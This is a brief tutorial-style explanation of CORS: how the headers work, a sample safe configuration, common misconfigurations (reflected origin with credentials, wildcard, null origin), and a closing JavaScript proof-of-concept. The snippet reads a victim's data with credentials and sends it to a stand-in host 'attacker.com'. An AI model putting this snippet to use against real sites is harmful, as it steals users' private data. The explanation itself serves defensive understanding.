Cross-Origin Resource Sharing (CORS) is a mechanism that allows servers to specify which origins can access their resources, relaxing the Same-Origin Policy in a controlled manner. Misconfigured CORS can lead to sensitive data exposure.
When a browser makes a cross-origin request, it sends an Origin header. The server responds with Access-Control-Allow-* headers specifying what's permitted. For complex requests, a preflight OPTIONS request is sent first.
Access-Control-Allow-Origin: https://trusted.com
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 86400# Reflecting any origin (very dangerous with credentials)
Access-Control-Allow-Origin: [attacker-controlled]
Access-Control-Allow-Credentials: true
# Wildcard with credentials (browsers block this)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# Null origin trust (exploitable via sandboxed iframes)
Access-Control-Allow-Origin: null<script>
// Attacker's site reads victim's data if CORS misconfigured
fetch('https://vulnerable-api.com/user/data', {
credentials: 'include'
})
.then(r => r.json())
.then(data => {
// Send stolen data to attacker
fetch('https://attacker.com/steal?data=' + JSON.stringify(data));
});
</script>